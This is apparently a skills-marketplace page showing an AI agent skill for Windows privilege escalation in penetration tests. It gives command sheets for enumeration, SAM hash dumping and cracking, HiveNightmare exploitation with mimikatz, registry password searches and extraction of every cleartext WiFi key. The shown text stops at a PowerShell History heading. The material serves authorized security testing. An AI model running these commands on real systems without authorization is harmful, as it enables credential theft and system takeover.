ranbot-ai/windows-privilege-escalation
skills/windows-privilege-escalation/SKILL.md
This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows miscon...
$ install --global
skillsauthnpx skillsauth add ranbot-ai/awesome-skills windows-privilege-escalationInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 5, 2026, 6:07 AM141.2s1 file scanned
SKILL.md
- name:
- windows-privilege-escalation
- description:
- This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows miscon...
- category:
- Security & Systems
- source:
- antigravity
- tags:
- [python, node, api, ai, workflow, document, image, security, vulnerability, aws]
- url:
- https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/windows-privilege-escalation
Windows Privilege Escalation
Purpose
Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.
Inputs / Prerequisites
- Initial Access: Shell or RDP access as standard user on Windows system
- Enumeration Tools: WinPEAS, PowerUp, Seatbelt, or manual commands
- Exploit Binaries: Pre-compiled exploits or ability to transfer tools
- Knowledge: Understanding of Windows security model and privileges
- Authorization: Written permission for penetration testing activities
Outputs / Deliverables
- Privilege Escalation Path: Identified vector to higher privileges
- Credential Dump: Harvested passwords, hashes, or tokens
- Elevated Shell: Command execution as Administrator or SYSTEM
- Vulnerability Report: Documentation of misconfigurations and exploits
- Remediation Recommendations: Fixes for identified weaknesses
Core Workflow
1. System Enumeration
Basic System Information
# OS version and patches
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
# Architecture
wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%
# Environment variables
set
Get-ChildItem Env: | ft Key,Value
# List drives
wmic logicaldisk get caption,description,providername
User Enumeration
# Current user
whoami
echo %USERNAME%
# User privileges
whoami /priv
whoami /groups
whoami /all
# All users
net user
Get-LocalUser | ft Name,Enabled,LastLogon
# User details
net user administrator
net user %USERNAME%
# Local groups
net localgroup
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
Network Enumeration
# Network interfaces
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
# Routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric
# ARP table
arp -A
# Active connections
netstat -ano
# Network shares
net share
# Domain Controllers
nltest /DCLIST:DomainName
Antivirus Enumeration
# Check AV products
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
2. Credential Harvesting
SAM and SYSTEM Files
# SAM file locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
# SYSTEM file locations
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Extract hashes (from Linux after obtaining files)
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt
# Crack with John
john --format=NT sam.txt
HiveNightmare (CVE-2021-36934)
# Check vulnerability
icacls C:\Windows\System32\config\SAM
# Vulnerable if: BUILTIN\Users:(I)(RX)
# Exploit with mimikatz
mimikatz> token::whoami /full
mimikatz> misc::shadowcopies
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Search for Passwords
# Search file contents
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
# Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Windows Autologin credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
# Search for specific files
dir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*
where /R C:\ *.ini
Unattend.xml Credentials
# Common locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
# Search for files
dir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul
# Decode base64 password (Linux)
echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
WiFi Passwords
# List profiles
netsh wlan show profile
# Get cleartext password
netsh wlan show profile <SSID> key=clear
# Extract all WiFi passwords
for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Key" | find /v "Number" & echo.) & @echo on
PowerShell History
Related Skills
ranbot-ai/android-dev
development
VerifiedTrustedCommunity
Production-grade Android app development guide covering native (Kotlin/Java), cross-platform (Flutter, RN, KMM), and hybrid architectures.
5SKILL.mdUpdated Jun 12, 2026
ranbot-ai/open-dynamic-workflows
testing
VerifiedTrustedCommunity
Plan, orchestrate, and adversarially verify parallel AI coding agents with a dynamic multi-agent workflow engine.
5SKILL.mdUpdated Jun 9, 2026
ranbot-ai/cv-generator
development
VerifiedTrustedCommunity
Generate professional, ATS-optimized CVs for FlowCV, Canva, Google Docs, or Word. Handles multi-source merging, JD targeting, seniority adaptation, and humanized rewriting. Outputs paste-ready text wi
5SKILL.mdUpdated Jun 9, 2026
ranbot-ai/article-illustrations
tools
VerifiedTrustedCommunity
Generate hand-drawn 16:9 article illustrations with the Grav character IP, sparse annotations, and absurd but clear visual metaphors.
5SKILL.mdUpdated Jun 9, 2026